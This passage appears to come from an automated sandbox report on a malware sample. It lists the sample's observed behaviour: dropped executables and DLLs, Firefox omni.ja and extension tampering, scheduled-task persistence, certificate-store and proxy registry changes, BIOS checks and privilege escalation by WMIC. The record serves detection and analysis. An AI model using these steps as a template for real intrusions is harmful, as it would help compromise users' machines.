File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\bHChqWbaifmeC\yfYcztl.xml C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\tYlulnlhfvUn\erYfueB.dll C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\atUnoJEcU\wUHcGx.dll C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\vFIWIzm.xml C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\pNvkEBQ.dll C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\OiJitsNRDAtU2\YqdZEqY.xml C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\OiJitsNRDAtU2\QwBUIHTcIGbxW.dll C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\bHChqWbaifmeC\HKEOgRB.dll C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\azeUktJAaUwkEYH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\CtcwvJUdbvqSdFcLs.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bjzvzwrptCEFdBfgJx.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\eKTzntQiDjkvtKkfQ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f429969b-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
